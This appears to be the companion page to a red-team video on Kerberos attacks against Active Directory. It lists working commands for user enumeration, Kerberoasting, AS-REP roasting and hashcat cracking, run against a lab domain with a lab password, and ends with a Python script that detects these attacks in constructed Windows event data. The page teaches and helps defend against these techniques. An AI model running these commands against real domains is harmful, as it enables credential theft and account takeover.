Active Directory
Windows
Kerberos
Red Team
Kerberos Attacks Explained: User Enumeration, Kerberoasting and AS-REP Roasting
// published · 2022-08-02
overview
Kerberos is the default authentication protocol in Active Directory environments — and a goldmine for attackers. This video covers the full attack chain: starting from user enumeration without credentials, through Kerberoasting to extract and crack service account hashes, to AS-REP Roasting against accounts with pre-authentication disabled. Each technique is demonstrated with multiple tools — from local execution on a compromised host to remote attacks via Impacket.
timestamps
- 00:00 Intro
- 00:26 Theory — how Kerberos authentication works
- 02:26 User enumeration — Kerbrute, Nmap, Metasploit
- 06:48 Kerberoasting — Rubeus and Impacket
- 15:08 AS-REP Roasting — Rubeus and Impacket
- 20:00 Outro
commands used
// user enumeration
kerbrute — enumerate valid domain users
# Kerbrute sends AS-REQ packets and reads the error codes:
# KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) = user doesn't exist
# KDC_ERR_PREAUTH_REQUIRED = user exists (pre-auth needed)
# download: https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
~/tools/kerbrute/kerbrute userenum \
--dc CONTROLLER.local \
-d CONTROLLER.local \
User.txt
nmap — enumerate users via krb5 nse script
# uses the same AS-REQ technique as Kerbrute
# useful when you only have nmap available on the target
nmap -p 88 --script=krb5-enum-users \
--script-args krb5-enum-users.realm='CONTROLLER.local',userdb=User.txt \
CONTROLLER.local
metasploit — kerberos_enumusers module
# bonus: this module also captures AS-REP hashes for accounts
# with pre-auth disabled — touching on AS-REP Roasting
msfconsole -q
use auxiliary/gather/kerberos_enumusers
set DOMAIN CONTROLLER.local
set RHOSTS CONTROLLER.local
set USER_FILE /home/m0rn1ngstr/thm/kerberos/User.txt
run
// kerberoasting
sharphound — collect bloodhound data
# transfer SharpHound to target machine
scp SharpHound.exe Administrator@CONTROLLER.local:C:/Users/Administrator/Downloads
# run on target — collects all AD objects, ACLs, sessions, and SPNs
cd C:\Users\Administrator\Downloads
.\SharpHound.exe -c All
# transfer the zip back to attacker machine for BloodHound
scp Administrator@Controller.local:C:/Users/Administrator/Downloads/20220802043744_BloodHound.zip .
rubeus — kerberoast all accounts (local)
# /nowrap — prevents base64 ticket from wrapping across lines (important for hashcat)
# /simple — outputs only the ticket hash, easier to copy and save
Rubeus.exe kerberoast /nowrap
Rubeus.exe kerberoast /nowrap /simple
rubeus — target a specific high-value account
# use BloodHound to identify high-privilege kerberoastable accounts first
# requesting a single ticket is stealthier than roasting all accounts
Rubeus.exe kerberoast /user:sqlservice /nowrap /simple
impacket — kerberoast remotely
# request tickets for all kerberoastable users
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request
# save all tickets directly to file
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request -outputfile k2_1.txt
# target a specific user
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request-user sqlservice
# target a specific user and save to file
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request-user sqlservice -outputfile k2_2.txt
hashcat — crack kerberoast tickets
# -m 13100 = Kerberos 5 TGS-REP (RC4) hash type
# -a 0 = straight/dictionary attack
# k2_1.txt is the -outputfile written by impacket-GetUserSPNs above
hashcat -m 13100 -a 0 k2_1.txt Pass.txt
// as-rep roasting
rubeus — as-rep roast all vulnerable users (local)
# targets accounts with "Do not require Kerberos preauthentication" enabled
# DC returns an encrypted TGT without verifying identity — crackable offline
Rubeus.exe asreproast /nowrap
# target a specific user identified via BloodHound
Rubeus.exe asreproast /nowrap /user:user3
impacket — as-rep roast remotely
# request tickets for all AS-REP-roastable users
impacket-GetNPUsers controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request
# target a specific user — use their name as credentials, skip password at prompt
impacket-GetNPUsers controller.local/User3 \
-dc-ip 10.10.82.144 -request
# authenticated + target multiple users from a file
impacket-GetNPUsers controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -usersfile userfile.txt
hashcat — crack as-rep roast hashes
# -m 18200 = Kerberos 5 AS-REP hash type (different from Kerberoasting)
# -a 0 = straight/dictionary attack
hashcat -m 18200 -a 0 hash2.txt Pass.txt
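Added example, not from the video or any of the tools above: each of the three techniques leaves a distinct trace in Windows Security events (4768 TGT requests with result 0x6 for names the KDC does not know, 4769 RC4 service-ticket requests for user-account SPNs, 4768 with pre-authentication type 0 for AS-REP roastable accounts), and this script scores a constructed batch of such events. The event field names, the sample data and the thresholds are assumptions for the illustration.

```python
from collections import defaultdict

RC4_HMAC = "0x17"          # weak etype typically requested when roasting
UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN, the code Kerbrute keys on
PREAUTH_NONE = 0           # Pre-Authentication Type 0 = no pre-auth (AS-REP roastable)

# Constructed sample events (not real telemetry); field names are assumptions.
EVENTS = [
    # one source probing usernames it does not know: failed TGT requests
    *[{"id": 4768, "src": "10.10.14.5", "user": u, "result": UNKNOWN_PRINCIPAL}
      for u in ("svc_backup", "jsmith", "admin2", "test", "helpdesk", "tmp")],
    # same source then pulls RC4 service tickets for several user-account SPNs
    {"id": 4769, "src": "10.10.14.5", "user": "Administrator", "service": "sqlservice",
     "etype": RC4_HMAC, "result": "0x0"},
    {"id": 4769, "src": "10.10.14.5", "user": "Administrator", "service": "httpservice",
     "etype": RC4_HMAC, "result": "0x0"},
    # benign: AES ticket for a machine account, normal during logons
    {"id": 4769, "src": "10.10.82.10", "user": "jane", "service": "CONTROLLER$",
     "etype": "0x12", "result": "0x0"},
    # TGT issued with no pre-authentication for user3
    {"id": 4768, "src": "10.10.14.5", "user": "user3", "preauth": PREAUTH_NONE,
     "etype": RC4_HMAC, "result": "0x0"},
    # benign: pre-authenticated logon (type 2 = PA-ENC-TIMESTAMP)
    {"id": 4768, "src": "10.10.82.10", "user": "jane", "preauth": 2,
     "etype": "0x12", "result": "0x0"},
]

def detect(events, enum_threshold=5, roast_threshold=2):
    """Return {"enumeration": [sources], "kerberoast": [sources], "asrep": [users]}."""
    unknown_by_src = defaultdict(int)
    rc4_spns_by_src = defaultdict(set)
    alerts = {"enumeration": [], "kerberoast": [], "asrep": []}
    for e in events:
        if e["id"] == 4768 and e["result"] == UNKNOWN_PRINCIPAL:
            unknown_by_src[e["src"]] += 1          # many unknown names from one source
        elif e["id"] == 4768 and e.get("preauth") == PREAUTH_NONE and e["result"] == "0x0":
            alerts["asrep"].append(e["user"])      # any no-preauth TGT for a user account
        elif e["id"] == 4769 and e["etype"] == RC4_HMAC and e["result"] == "0x0":
            svc = e["service"]
            if not svc.endswith("$") and svc.lower() != "krbtgt":   # skip machine accounts
                rc4_spns_by_src[e["src"]].add(svc)
    alerts["enumeration"] = [s for s, n in unknown_by_src.items() if n >= enum_threshold]
    alerts["kerberoast"] = [s for s, spns in rc4_spns_by_src.items() if len(spns) >= roast_threshold]
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

A single targeted request (the `/user:sqlservice` case above) stays under the distinct-SPN threshold, which is exactly why the page calls it stealthier; lowering `roast_threshold` trades that gap for more noise from legitimate RC4 clients.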